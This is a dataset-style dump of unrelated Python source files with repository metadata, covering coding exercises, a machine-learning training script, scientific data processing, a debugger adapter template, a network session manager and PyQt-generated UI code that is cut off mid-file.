4a146453de50f8d311f3098ba7bfcee22555800b
| 356
|
py
|
Python
|
ex060.py
|
igormba/python-exercises
|
000190c4b62dc64bbb2fb039a103890945b88fa5
|
[
"MIT"
] | null | null | null |
ex060.py
|
igormba/python-exercises
|
000190c4b62dc64bbb2fb039a103890945b88fa5
|
[
"MIT"
] | null | null | null |
ex060.py
|
igormba/python-exercises
|
000190c4b62dc64bbb2fb039a103890945b88fa5
|
[
"MIT"
] | null | null | null |
'''Faça um programa que leia um número qualquer e mostre o seu fatorial.
Ex: 5! = 5x4x3x2x1 = 120'''
from math import factorial
n = int(input('Informe um número: '))
c = n
print('Calculando {}! = '.format(n), end=' ')
while c > 0:
print('{}'.format(c), end=' ')
print(' x ' if c > 1 else ' = ', end=' ')
c -= 1
print('{}'.format(factorial(n)))
| 29.666667
| 72
| 0.581461
|
4a14658295447a21b5532ee9f7106e0c378d613f
| 2,073
|
py
|
Python
|
code/ch05/5.2.4-number-of-islands.py
|
leetcode-pp/leetcode-pp1
|
a1f9e46fdd2f480d2fcb94e76370e040e0f0a4f5
|
[
"MIT"
] | 22
|
2021-02-23T13:42:28.000Z
|
2022-03-02T11:19:28.000Z
|
code/ch05/5.2.4-number-of-islands.py
|
leetcode-pp/leetcode-pp1
|
a1f9e46fdd2f480d2fcb94e76370e040e0f0a4f5
|
[
"MIT"
] | 9
|
2021-06-16T10:42:01.000Z
|
2021-08-24T09:06:29.000Z
|
code/ch05/5.2.4-number-of-islands.py
|
leetcode-pp/leetcode-pp1
|
a1f9e46fdd2f480d2fcb94e76370e040e0f0a4f5
|
[
"MIT"
] | 9
|
2021-02-20T08:29:00.000Z
|
2021-09-18T08:52:25.000Z
|
from typing import List
class Solution:
class UnionFind:
def __init__(self, grid):
self.count = 0
m = len(grid)
n = len(grid[0])
self.parent = [0 for _ in range(m * n)]
self.rank = [0 for _ in range(m * n)]
for i in range(m): # 这里我们进行初始化的工作
for j in range(n):
if grid[i][j] == "1":
self.parent[i * n + j] = i * n + j
self.count += 1
def find(self, i):
if self.parent[i] != i:
self.parent[i] = self.find(self.parent[i])
return self.parent[i]
def union(self, x, y):
rootx = self.find(x)
rooty = self.find(y)
if rootx != rooty:
if self.rank[rootx] > self.rank[rooty]:
self.parent[rooty] = rootx
elif self.rank[rootx] < self.rank[rooty]:
self.parent[rootx] = rooty
else:
self.parent[rooty] = rootx
self.rank[rootx] += 1
self.count -= 1
def getCount(self):
return self.count
def numIslands(self, grid: List[List[str]]) -> int:
if not grid or not grid[0]:
return 0
# ans = 0
nr = len(grid)
nc = len(grid[0])
uf = self.UnionFind(grid)
for i in range(nr):
for j in range(nc):
if grid[i][j] == "1":
grid[i][j] = "0"
if i - 1 >= 0 and grid[i - 1][j] == "1":
uf.union(i * nc + j, (i - 1) * nc + j)
if i + 1 < nr and grid[i + 1][j] == "1":
uf.union(i * nc + j, (i + 1) * nc + j)
if j - 1 >= 0 and grid[i][j - 1] == "1":
uf.union(i * nc + j, i * nc + j - 1)
if j + 1 < nc and grid[i][j + 1] == "1":
uf.union(i * nc + j, i * nc + j + 1)
return uf.getCount()
| 33.435484
| 62
| 0.387844
|
4a146721b7a25fd43192d67da0d185a0d2c52dff
| 5,344
|
py
|
Python
|
sr-pwc/scripts/finetune_srpwc_things.py
|
ashariati/srfnet
|
2171a635006d3ac98e39a9f07c17027b70e5aead
|
[
"MIT"
] | null | null | null |
sr-pwc/scripts/finetune_srpwc_things.py
|
ashariati/srfnet
|
2171a635006d3ac98e39a9f07c17027b70e5aead
|
[
"MIT"
] | null | null | null |
sr-pwc/scripts/finetune_srpwc_things.py
|
ashariati/srfnet
|
2171a635006d3ac98e39a9f07c17027b70e5aead
|
[
"MIT"
] | null | null | null |
import sys
import os
import pprint
import math
import PIL
import numpy as np
import torch
from torch import nn
from torch import optim
from torch.utils.data import DataLoader
import torchvision
import torchvision.transforms as transforms
import torchvision.utils as vutils
import tensorboardX
from tensorboardX import SummaryWriter
sys.path.append('..')
import data_utils
from data_utils import Sintel
from data_utils import FlyingChairs
from data_utils import FlyingThings
import flow_utils
import networks
from networks import SRPWCNet
from networks import PWCNet
from networks import SRResNet
import pdb
# for maintaining consistent training/validation splits
torch.manual_seed(3607)
# training parameters
batch_size = 4
lr = 1e-5
alpha = [0.005, 0.01, 0.02]
start_epoch = 3
max_epochs = 30
log_interval = 10
save_interval = 1
pwc_end_epoch = 22
sr_end_epoch = 95
# visualizations
writer = SummaryWriter()
flowviz_transform = transforms.Compose([flow_utils.ToFlow(),
flow_utils.ToRGBImage(),
transforms.ToTensor()])
imageviz_transform = transforms.Compose([transforms.ToPILImage(),
transforms.Resize((96, 192), interpolation=PIL.Image.NEAREST),
transforms.ToTensor()])
# data transforms
sample_transforms = transforms.Compose([
transforms.Resize((24, 48)),
transforms.ToTensor()])
target_transforms = transforms.Compose([
flow_utils.ToTensor()])
# data
nvset = 500
training_set = 'flying_things'
dataset = FlyingThings('/data1/data/flying_things',
transform=sample_transforms, target_transform=target_transforms,
pyramid_levels=[2, 3, 4], flow_scale=20., crop_dim=(384, 768))
trainset, validset = torch.utils.data.random_split(dataset, (dataset.__len__() - nvset, nvset))
torch.manual_seed(3607 + start_epoch)
trainloader = DataLoader(trainset, batch_size=batch_size, num_workers=4, shuffle=True)
validloader = DataLoader(validset, batch_size=10, num_workers=4)
# setup network
model = None
if start_epoch > 0:
model = SRPWCNet(SRResNet().cuda(), PWCNet().cuda(), freeze_pwc=True).cuda()
checkpoint_file = os.path.join(os.getcwd(), 'states', training_set, 'srpwc_%d.pkl' % start_epoch)
model.load_state_dict(torch.load(checkpoint_file))
print('Loading checkpoint')
else:
pwc_model = PWCNet().cuda()
pwc_checkpoint_file = os.path.join(os.getcwd(), 'states', training_set, 'pwc_%d.pkl' % pwc_end_epoch)
pwc_model.load_state_dict(torch.load(pwc_checkpoint_file))
sr_model = SRResNet().cuda()
sr_checkpoint_file = os.path.join(os.getcwd(), 'states', 'flying_chairs', 'srresnet_%d.pkl' % sr_end_epoch)
sr_model.load_state_dict(torch.load(sr_checkpoint_file))
model = SRPWCNet(sr_model, pwc_model, freeze_pwc=True).cuda()
print('Loading initial sub networks')
optimizer = optim.Adam(model.parameters(), lr=lr)
scheduler = optim.lr_scheduler.StepLR(optimizer, 1e5, gamma=0.5)
criterion = flow_utils.EPELoss()
# criterion = flow_utils.RobustLoss(0.01, 0.4)
n_iter = start_epoch * math.ceil(float(trainset.__len__()) / batch_size)
model.train()
for epoch in range(start_epoch, max_epochs):
for image1, image2, flow_gt in trainloader:
image1 = image1.cuda()
image2 = image2.cuda()
flow_gt = [flow.cuda() for flow in flow_gt]
flow_hat = model(image1, image2)
loss = alpha[0] * criterion(flow_hat[0], flow_gt[0]) + \
alpha[1] * criterion(flow_hat[1], flow_gt[1]) + \
alpha[2] * criterion(flow_hat[2], flow_gt[2])
optimizer.zero_grad()
loss.backward()
optimizer.step()
n_iter += 1
scheduler.step()
if n_iter % log_interval == 0:
print('epoch [{}/{}], iteration [{}], loss: {:.5f}'.format(epoch + 1,
max_epochs, n_iter, loss.item()))
# visualizations
writer.add_scalar('data/loss', loss.item(), n_iter)
n_samples = flow_gt[0].shape[0]
flow_hat_image = torch.stack([flowviz_transform(flow_hat[0].detach().cpu()[i, :, :, :]) for i in range(n_samples)])
flow_gt_image = torch.stack([flowviz_transform(flow_gt[0].detach().cpu()[i, :, :, :]) for i in range(n_samples)])
image1_resized = torch.stack([imageviz_transform(image1.cpu()[i, :, :, :]) for i in range(n_samples)])
flow_image = torch.cat((image1_resized, flow_gt_image, flow_hat_image))
progress_images = vutils.make_grid(flow_image, nrow=batch_size)
writer.add_image('flows', progress_images, n_iter)
if (epoch + 1) % save_interval == 0:
checkpoint_file = os.path.join(os.getcwd(), 'states', training_set, 'srpwc_%d.pkl' % (epoch + 1))
torch.save(model.state_dict(), checkpoint_file)
verror = 0
viters = 0
for image1, image2, flow_gt in validloader:
image1 = image1.cuda()
image2 = image2.cuda()
flow_gt = [flow.cuda() for flow in flow_gt]
flow_hat = model(image1, image2)
verror += flow_utils.AEPE(5 * flow_gt[0], 5 * flow_hat[0]).item()
viters += 1
writer.add_scalar('data/aepe', verror / viters, n_iter)
writer.close()
| 31.069767
| 128
| 0.665232
|
4a1468295604457cdf2851be5a5fc5e785a2bde6
| 2,453
|
py
|
Python
|
pyspedas/mms/feeps/mms_feeps_spin_avg.py
|
asherp/pyspedas
|
b9856157e63a711f3d7b979b15b3bafade2bd2a8
|
[
"MIT"
] | null | null | null |
pyspedas/mms/feeps/mms_feeps_spin_avg.py
|
asherp/pyspedas
|
b9856157e63a711f3d7b979b15b3bafade2bd2a8
|
[
"MIT"
] | null | null | null |
pyspedas/mms/feeps/mms_feeps_spin_avg.py
|
asherp/pyspedas
|
b9856157e63a711f3d7b979b15b3bafade2bd2a8
|
[
"MIT"
] | null | null | null |
import warnings
import numpy as np
from pytplot import get_data, store_data, options
def mms_feeps_spin_avg(probe='1', data_units='intensity', datatype='electron', data_rate='srvy', level='l2', suffix=''):
"""
This function will spin-average the omni-directional FEEPS energy spectra
Parameters:
probe: str
probe #, e.g., '4' for MMS4
data_units: str
'intensity' or 'count_rate'
datatype: str
'electron' or 'ion'
data_rate: str
instrument data rate, e.g., 'srvy' or 'brst'
level: str
data level, e.g., 'l2'
suffix: str
suffix of the loaded data
Returns:
Name of tplot variable created.
"""
units_label = ''
if data_units == 'intensity':
units_label = '1/(cm^2-sr-s-keV)'
elif data_units == 'counts':
units_label = '[counts/s]'
if datatype == 'electron':
lower_en = 71
else:
lower_en = 78
prefix = 'mms'+str(probe)+'_epd_feeps_'
# get the spin sectors
# v5.5+ = mms1_epd_feeps_srvy_l1b_electron_spinsectnum
sector_times, spin_sectors = get_data(prefix + data_rate + '_' + level + '_' + datatype + '_spinsectnum' + suffix)
spin_starts = [spin_end + 1 for spin_end in np.where(spin_sectors[:-1] >= spin_sectors[1:])[0]]
var_name = prefix + data_rate + '_' + level + '_' + datatype + '_' + data_units + '_omni'
times, data, energies = get_data(var_name)
spin_avg_flux = np.zeros([len(spin_starts), len(energies)])
current_start = spin_starts[0]
for spin_idx in range(1, len(spin_starts)-1):
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=RuntimeWarning)
spin_avg_flux[spin_idx-1, :] = np.nanmean(data[current_start:spin_starts[spin_idx]+1, :], axis=0)
current_start = spin_starts[spin_idx] + 1
store_data(var_name + '_spin' + suffix, data={'x': times[spin_starts], 'y': spin_avg_flux, 'v': energies})
options(var_name + '_spin' + suffix, 'spec', True)
options(var_name + '_spin' + suffix, 'ylog', True)
options(var_name + '_spin' + suffix, 'zlog', True)
options(var_name + '_spin' + suffix, 'Colormap', 'jet')
options(var_name + '_spin' + suffix, 'ztitle', units_label)
options(var_name + '_spin' + suffix, 'ytitle', 'MMS' + str(probe) + ' ' + datatype + ' (keV)')
return var_name + '_spin' + suffix
| 35.550725
| 120
| 0.618019
|
4a1468655827d2c49ea4832b4a93c1513a468e17
| 916
|
py
|
Python
|
PyByteReader/byte_reader.py
|
ventralnet/PyByteReader
|
e4e9c8fda4a45aad5401c66aa350ad069d3d0bf8
|
[
"MIT"
] | null | null | null |
PyByteReader/byte_reader.py
|
ventralnet/PyByteReader
|
e4e9c8fda4a45aad5401c66aa350ad069d3d0bf8
|
[
"MIT"
] | null | null | null |
PyByteReader/byte_reader.py
|
ventralnet/PyByteReader
|
e4e9c8fda4a45aad5401c66aa350ad069d3d0bf8
|
[
"MIT"
] | null | null | null |
class ByteReader:
def __init__(self, file_input):
self.file_input = file_input
def readByte(self):
return self.file_input.read(1)
def readByteAsInt(self):
return int.from_bytes(self.readByte(), "big")
def readString(self):
length = int.from_bytes(self.readByte(), "big")
return self.readStringLength(length if (length < 0xff) else self.readShort())
def readStringLength(self, length):
return self.file_input.read(length).decode('utf-8')
def readInt(self):
bytes = self.file_input.read(4)
return ((bytes[3] & 0xff) << 24) | ((bytes[2] & 0xff) << 16) | ((bytes[1] & 0xff) << 8) | (bytes[0] & 0xff)
def readShort(self):
bytes = self.file_input.read(2)
return ((bytes[1] & 0xff) << 8) | (bytes[0] & 0xff)
def readBoolean(self):
bool = int.from_bytes(self.readByte(), "big") > 0
return bool
def skip(self, bytes):
self.file_input.read(bytes)
| 27.757576
| 111
| 0.649563
|
4a14689ea0e95b89b6d44a34c8f3bb2b1c3cb018
| 469
|
py
|
Python
|
myscripts/wmt14/valid_search/read_score.py
|
xx-zhou16/Grammar
|
45600cdb3e1de06551c623d289d941befba1c2b8
|
[
"MIT"
] | null | null | null |
myscripts/wmt14/valid_search/read_score.py
|
xx-zhou16/Grammar
|
45600cdb3e1de06551c623d289d941befba1c2b8
|
[
"MIT"
] | null | null | null |
myscripts/wmt14/valid_search/read_score.py
|
xx-zhou16/Grammar
|
45600cdb3e1de06551c623d289d941befba1c2b8
|
[
"MIT"
] | null | null | null |
import os
import re
def read_BLEU4(file_path):
last_line = None
with open(file_path, 'r') as f:
last_line = f.readlines()[-1]
target = re.search(r'BLEU4 = (.*?), ', last_line)
#print(target.group(1))
target = target.group(1)
return float(target)
if __name__ == "__main__":
file_path = "/mnt/xiangxin2/data/wmt14/checkpoints/top-2L-layerdrop-0.3_6L/checkpoint_best/generate-valid.txt"
print(read_BLEU4(file_path))
| 27.588235
| 114
| 0.652452
|
4a1469300e4855eb83c549ea01daf2c32220c742
| 866
|
py
|
Python
|
Python/python-tutorials/python-challenge/disproportional.py
|
zhongyangynag/code-study
|
5410929554107a384a09d899c6fa3d16ed383d2b
|
[
"MIT"
] | null | null | null |
Python/python-tutorials/python-challenge/disproportional.py
|
zhongyangynag/code-study
|
5410929554107a384a09d899c6fa3d16ed383d2b
|
[
"MIT"
] | null | null | null |
Python/python-tutorials/python-challenge/disproportional.py
|
zhongyangynag/code-study
|
5410929554107a384a09d899c6fa3d16ed383d2b
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# coding: utf-8
# http://www.pythonchallenge.com/pc/return/disproportional.html
import urllib
# downlaod file with password
# user: huge passwd: file
url="http://huge:file@www.pythonchallenge.com/pc/phonebook.php"
filename=url.split('/')[-1]
urllib.urlretrieve(url,filename)
# from the php file:
# faultCode 105
# faultString XML error: Invalid document end at line 1, column 1
# aparently, this is an xmlrpc error
import xmlrpclib
server=xmlrpclib.ServerProxy("http://www.pythonchallenge.com/pc/phonebook.php")
print server.system.listMethods()
# Got: ['phone', 'system.listMethods', 'system.methodHelp', 'system.methodSignature', 'system.multicall', 'system.getCapabilities']
print server.system.methodHelp('phone')
# Got: Returns the phone of a person
print server.phone('Bert') # 这里的Bert是上一关的提示信息
# Got 555-ITALY
# next level is italy
| 28.866667
| 131
| 0.757506
|
4a14694303acf091e141ee17f52cb1b4503a92b0
| 3,254
|
py
|
Python
|
adapter/template.py
|
blurstudio/SublimeDebugger-Plugin
|
b47e531882352e89bfe02c5a7a1fbac2e90a4680
|
[
"MIT"
] | 4
|
2021-01-12T09:17:55.000Z
|
2022-02-23T13:14:23.000Z
|
adapter/template.py
|
blurstudio/SublimeDebugger-Plugin
|
b47e531882352e89bfe02c5a7a1fbac2e90a4680
|
[
"MIT"
] | null | null | null |
adapter/template.py
|
blurstudio/SublimeDebugger-Plugin
|
b47e531882352e89bfe02c5a7a1fbac2e90a4680
|
[
"MIT"
] | null | null | null |
from Debugger.modules.typecheck import *
# This import moves around based on the Debugger version being used
try:
import Debugger.modules.debugger.adapter as adapter
except:
import Debugger.modules.adapters.adapter as adapter
import sublime
# This is the id of your adapter. It must be unique and match no
# other existing adapters.
adapter_type = 'template'
class TemplateAdapter(adapter.AdapterConfiguration):
@property
def type(self): return adapter_type
async def start(self, log, configuration):
"""
start() is called when the play button is pressed in the debugger.
The configuration is passed in, allowing you to get necessary settings
to use when setting up the adapter as it starts up (such as getting the
desired host/port to connect to, show below)
The configuration will be chosen by the user from the
configuration_snippets function below, and its contents are the contents
of "body:". However, the user can change the configurations manually so
make sure to account for unexpected changes.
"""
# This function must return one of two types of Transports.
#
# The first is an StdioTransport, which communicates with the adapter
# via DAP through standard input/output. A command must be given so
# that the transport can spawn the process and communicate with it.
#
# return adapter.StdioTransport(log, ["python", "my_adapter.py"])
#
# The second is a SocketTransport, which communicates with the
# adapter through a socket connection via DAP.
host = configuration.get('host', 'localhost')
port = int(configuration.get('port', 9000))
return adapter.SocketTransport(log, host, port)
async def install(self, log):
"""
When someone installs your adapter, they will also have to install it
through the debugger itself. That is when this function is called. It
allows you to download any extra files or resources, or install items
to other parts of the device to prepare for debugging in the future
"""
pass
@property
def installed_version(self) -> Optional[str]:
# The version is only used for display in the UI
return '0.0.1'
@property
def configuration_snippets(self) -> Optional[list]:
"""
You can have several configurations here depending on your adapter's
offered functionalities, but they all need a "label", "description",
and "body"
"""
return [
{
"label": "Template Adapter",
"description": "A template debug adapter to show how to connect to the debugger",
"body": {
"name": "Template Adapter",
"type": adapter_type,
"request": "attach", # can only be attach or launch
"host": "localhost",
"port": 9000,
}
},
]
@property
def configuration_schema(self) -> Optional[dict]:
"""
I am not completely sure what this function is used for. However,
it must be present.
"""
return None
async def configuration_resolve(self, configuration):
"""
In this function, you can take a currently existing configuration and
resolve various variables in it before it gets passed to start().
Therefore, configurations where values are stated as {my_var} can
then be filled out before being used to start the adapter.
"""
return configuration
| 29.853211
| 85
| 0.722495
|
4a1469b6007eb43c8ea911ee36cf0b4ea0c6bbef
| 867
|
py
|
Python
|
demos/grasp_fusion/ros/grasp_fusion/node_scripts/bounding_box_to_tf.py
|
pazeshun/jsk_apc
|
0ff42000ad5992f8a31e719a5360a39cf4fa1fde
|
[
"BSD-3-Clause"
] | null | null | null |
demos/grasp_fusion/ros/grasp_fusion/node_scripts/bounding_box_to_tf.py
|
pazeshun/jsk_apc
|
0ff42000ad5992f8a31e719a5360a39cf4fa1fde
|
[
"BSD-3-Clause"
] | 2
|
2019-04-11T05:36:23.000Z
|
2019-08-19T12:58:10.000Z
|
demos/grasp_fusion/ros/grasp_fusion/node_scripts/bounding_box_to_tf.py
|
pazeshun/jsk_apc
|
0ff42000ad5992f8a31e719a5360a39cf4fa1fde
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
import rospy
import tf
from jsk_recognition_msgs.msg import BoundingBox
class BoundingBoxToTf(object):
def __init__(self):
self.tf_frame = rospy.get_param('~tf_frame', 'bounding_box')
self.broadcaster = tf.TransformBroadcaster()
self.sub = rospy.Subscriber('~input', BoundingBox, self._cb)
def _cb(self, bbox):
pos = bbox.pose.position
ornt = bbox.pose.orientation
self.broadcaster.sendTransform((pos.x, pos.y, pos.z),
(ornt.x, ornt.y, ornt.z, ornt.w),
rospy.Time.now(),
self.tf_frame,
bbox.header.frame_id)
if __name__ == '__main__':
rospy.init_node(' bounding_box_to_tf')
app = BoundingBoxToTf()
rospy.spin()
| 27.09375
| 72
| 0.55594
|
4a146a4aac7916f514dfa1386dd29d72870956fd
| 1,838
|
py
|
Python
|
dql/expressions/base.py
|
ikonst/dql
|
e9d3aa22873076dae5ebd02e35318aa996b1e56a
|
[
"MIT"
] | null | null | null |
dql/expressions/base.py
|
ikonst/dql
|
e9d3aa22873076dae5ebd02e35318aa996b1e56a
|
[
"MIT"
] | null | null | null |
dql/expressions/base.py
|
ikonst/dql
|
e9d3aa22873076dae5ebd02e35318aa996b1e56a
|
[
"MIT"
] | null | null | null |
""" Common utilities for all expressions """
from future.utils import python_2_unicode_compatible
import re
from .visitor import dummy_visitor
PATH_PATTERN = re.compile(r"\w+|\[(\d+)\]")
@python_2_unicode_compatible
class Expression(object):
""" Base class for all expressions and expression fragments """
def build(self, visitor):
""" Build string expression, using the visitor to encode values """
raise NotImplementedError
def __str__(self):
return self.build(dummy_visitor)
class Field(Expression):
""" Wrapper for a field in an expression """
def __init__(self, field):
self.field = field
def build(self, visitor):
return visitor.get_field(self.field)
def evaluate(self, item):
""" Pull the field off the item """
try:
for match in PATH_PATTERN.finditer(self.field):
path = match.group(0)
if path[0] == "[":
# If we're selecting an item at a specific index of an
# array, we will usually not get back the whole array from
# Dynamo. It'll return an array with one element.
try:
item = item[int(match.group(1))]
except IndexError:
item = item[0]
else:
item = item.get(path)
except (IndexError, TypeError, AttributeError):
return None
return item
class Value(Expression):
""" Wrapper for a value in an expression """
def __init__(self, val):
self.value = val
def build(self, visitor):
return visitor.get_value(self.value)
def evaluate(self, item):
""" Values evaluate to themselves regardless of the item """
return self.value
| 27.029412
| 78
| 0.583243
|
4a146be7c9402cec4fe37f5638a1b2804b9f885f
| 7,249
|
py
|
Python
|
include/ClientNetworkingSessions.py
|
MsgLosers/hydrus
|
febaa5ff1a6b94a49d0eba513ff41541c57f78cc
|
[
"WTFPL"
] | null | null | null |
include/ClientNetworkingSessions.py
|
MsgLosers/hydrus
|
febaa5ff1a6b94a49d0eba513ff41541c57f78cc
|
[
"WTFPL"
] | 50
|
2019-04-05T02:25:13.000Z
|
2019-04-27T04:29:31.000Z
|
include/ClientNetworkingSessions.py
|
MsgLosers/hydrus
|
febaa5ff1a6b94a49d0eba513ff41541c57f78cc
|
[
"WTFPL"
] | null | null | null |
import pickle
from . import ClientConstants as CC
from . import ClientNetworkingContexts
from . import ClientNetworkingDomain
from . import HydrusData
from . import HydrusSerialisable
from . import HydrusGlobals as HG
import requests
import threading
try:
import socket
import socks
SOCKS_PROXY_OK = True
except:
SOCKS_PROXY_OK = False
class NetworkSessionManager( HydrusSerialisable.SerialisableBase ):
SERIALISABLE_TYPE = HydrusSerialisable.SERIALISABLE_TYPE_NETWORK_SESSION_MANAGER
SERIALISABLE_NAME = 'Session Manager'
SERIALISABLE_VERSION = 1
SESSION_TIMEOUT = 60 * 60
def __init__( self ):
HydrusSerialisable.SerialisableBase.__init__( self )
self.engine = None
self._dirty = False
self._lock = threading.Lock()
self._network_contexts_to_sessions = {}
self._network_contexts_to_session_timeouts = {}
self._proxies_dict = {}
self._Reinitialise()
HG.client_controller.sub( self, 'Reinitialise', 'notify_new_options' )
def _CleanSessionCookies( self, network_context, session ):
if network_context not in self._network_contexts_to_session_timeouts:
self._network_contexts_to_session_timeouts[ network_context ] = 0
if HydrusData.TimeHasPassed( self._network_contexts_to_session_timeouts[ network_context ] ):
session.cookies.clear_session_cookies()
self._network_contexts_to_session_timeouts[ network_context ] = HydrusData.GetNow() + self.SESSION_TIMEOUT
session.cookies.clear_expired_cookies()
def _GenerateSession( self, network_context ):
session = requests.Session()
if network_context.context_type == CC.NETWORK_CONTEXT_HYDRUS:
session.verify = False
return session
def _GetSerialisableInfo( self ):
serialisable_network_contexts_to_sessions = [ ( network_context.GetSerialisableTuple(), pickle.dumps( session ).hex() ) for ( network_context, session ) in list(self._network_contexts_to_sessions.items()) ]
return serialisable_network_contexts_to_sessions
def _GetSessionNetworkContext( self, network_context ):
# just in case one of these slips through somehow
if network_context.context_type == CC.NETWORK_CONTEXT_DOMAIN:
second_level_domain = ClientNetworkingDomain.ConvertDomainIntoSecondLevelDomain( network_context.context_data )
network_context = ClientNetworkingContexts.NetworkContext( CC.NETWORK_CONTEXT_DOMAIN, second_level_domain )
return network_context
def _InitialiseFromSerialisableInfo( self, serialisable_info ):
serialisable_network_contexts_to_sessions = serialisable_info
for ( serialisable_network_context, pickled_session_hex ) in serialisable_network_contexts_to_sessions:
network_context = HydrusSerialisable.CreateFromSerialisableTuple( serialisable_network_context )
try:
session = pickle.loads( bytes.fromhex( pickled_session_hex ) )
except:
# new version of requests uses a diff format, wew
continue
session.cookies.clear_session_cookies()
self._network_contexts_to_sessions[ network_context ] = session
def _Reinitialise( self ):
self._proxies_dict = {}
http_proxy = HG.client_controller.new_options.GetNoneableString( 'http_proxy' )
https_proxy = HG.client_controller.new_options.GetNoneableString( 'https_proxy' )
if http_proxy is not None:
self._proxies_dict[ 'http' ] = http_proxy
if https_proxy is not None:
self._proxies_dict[ 'https' ] = https_proxy
def _SetDirty( self ):
self._dirty = True
def ClearSession( self, network_context ):
with self._lock:
network_context = self._GetSessionNetworkContext( network_context )
if network_context in self._network_contexts_to_sessions:
del self._network_contexts_to_sessions[ network_context ]
self._SetDirty()
def GetNetworkContexts( self ):
with self._lock:
return list(self._network_contexts_to_sessions.keys())
def GetSession( self, network_context ):
with self._lock:
network_context = self._GetSessionNetworkContext( network_context )
if network_context not in self._network_contexts_to_sessions:
self._network_contexts_to_sessions[ network_context ] = self._GenerateSession( network_context )
session = self._network_contexts_to_sessions[ network_context ]
if session.proxies != self._proxies_dict:
session.proxies = dict( self._proxies_dict )
#
self._CleanSessionCookies( network_context, session )
#
# tumblr can't into ssl for some reason, and the data subdomain they use has weird cert properties, looking like amazon S3
# perhaps it is inward-facing somehow? whatever the case, let's just say fuck it for tumblr
if network_context.context_type == CC.NETWORK_CONTEXT_DOMAIN and network_context.context_data == 'tumblr.com':
session.verify = False
#
self._SetDirty()
return session
def GetSessionForDomain( self, domain ):
network_context = ClientNetworkingContexts.NetworkContext( context_type = CC.NETWORK_CONTEXT_DOMAIN, context_data = domain )
return self.GetSession( network_context )
def IsDirty( self ):
with self._lock:
return self._dirty
def Reinitialise( self ):
with self._lock:
self._Reinitialise()
def SetClean( self ):
with self._lock:
self._dirty = False
HydrusSerialisable.SERIALISABLE_TYPES_TO_OBJECT_TYPES[ HydrusSerialisable.SERIALISABLE_TYPE_NETWORK_SESSION_MANAGER ] = NetworkSessionManager
| 29.709016
| 214
| 0.576217
|
4a146c6d85af3347c63d3a82c950192160d2063a
| 5,127
|
py
|
Python
|
aui/gui/robot/internal/ui_wifi.py
|
argenortega/AUI
|
5e90bb59e283e829cb41d07dff9d1c8c75daa890
|
[
"MIT"
] | null | null | null |
aui/gui/robot/internal/ui_wifi.py
|
argenortega/AUI
|
5e90bb59e283e829cb41d07dff9d1c8c75daa890
|
[
"MIT"
] | null | null | null |
aui/gui/robot/internal/ui_wifi.py
|
argenortega/AUI
|
5e90bb59e283e829cb41d07dff9d1c8c75daa890
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ui/wifi.ui'
#
# Created: Mon Aug 31 12:21:34 2015
# by: PyQt4 UI code generator 4.11.1
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_WifiStatus(object):
def setupUi(self, WifiStatus):
WifiStatus.setObjectName(_fromUtf8("WifiStatus"))
WifiStatus.resize(105, 108)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(1)
sizePolicy.setVerticalStretch(1)
sizePolicy.setHeightForWidth(WifiStatus.sizePolicy().hasHeightForWidth())
WifiStatus.setSizePolicy(sizePolicy)
WifiStatus.setMinimumSize(QtCore.QSize(100, 0))
WifiStatus.setMaximumSize(QtCore.QSize(150, 16777215))
self.horizontalLayout_2 = QtGui.QHBoxLayout(WifiStatus)
self.horizontalLayout_2.setSpacing(0)
self.horizontalLayout_2.setMargin(0)
self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
self.wifiLevel = QtGui.QGroupBox(WifiStatus)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.wifiLevel.sizePolicy().hasHeightForWidth())
self.wifiLevel.setSizePolicy(sizePolicy)
self.wifiLevel.setMinimumSize(QtCore.QSize(0, 30))
self.wifiLevel.setMaximumSize(QtCore.QSize(16777215, 16777215))
font = QtGui.QFont()
font.setPointSize(11)
self.wifiLevel.setFont(font)
self.wifiLevel.setCheckable(True)
self.wifiLevel.setObjectName(_fromUtf8("wifiLevel"))
self.wifiLayout = QtGui.QVBoxLayout(self.wifiLevel)
self.wifiLayout.setSpacing(0)
self.wifiLayout.setMargin(0)
self.wifiLayout.setObjectName(_fromUtf8("wifiLayout"))
self.frame = QtGui.QFrame(self.wifiLevel)
self.frame.setFrameShape(QtGui.QFrame.NoFrame)
self.frame.setFrameShadow(QtGui.QFrame.Plain)
self.frame.setObjectName(_fromUtf8("frame"))
self.verticalLayout = QtGui.QVBoxLayout(self.frame)
self.verticalLayout.setSpacing(25)
self.verticalLayout.setMargin(0)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.wifi = CProgressBar(self.frame)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.wifi.sizePolicy().hasHeightForWidth())
self.wifi.setSizePolicy(sizePolicy)
self.wifi.setMinimumSize(QtCore.QSize(0, 25))
self.wifi.setProperty("value", 100)
self.wifi.setAlignment(QtCore.Qt.AlignCenter)
self.wifi.setObjectName(_fromUtf8("wifi"))
self.verticalLayout.addWidget(self.wifi)
self.repair = QtGui.QPushButton(self.frame)
self.repair.setMinimumSize(QtCore.QSize(44, 44))
self.repair.setStyleSheet(_fromUtf8("QPushButton{ \n"
" background-color: rgb(255, 255, 255);\n"
" border-style: outset;\n"
" border-width: 1px;\n"
" border-radius: 6px;\n"
" border-color: rgb(193, 193, 193);\n"
" border-style: solid;\n"
" padding: 6px;\n"
" \n"
"}\n"
"QPushButton:pressed { \n"
" border-style: solid;\n"
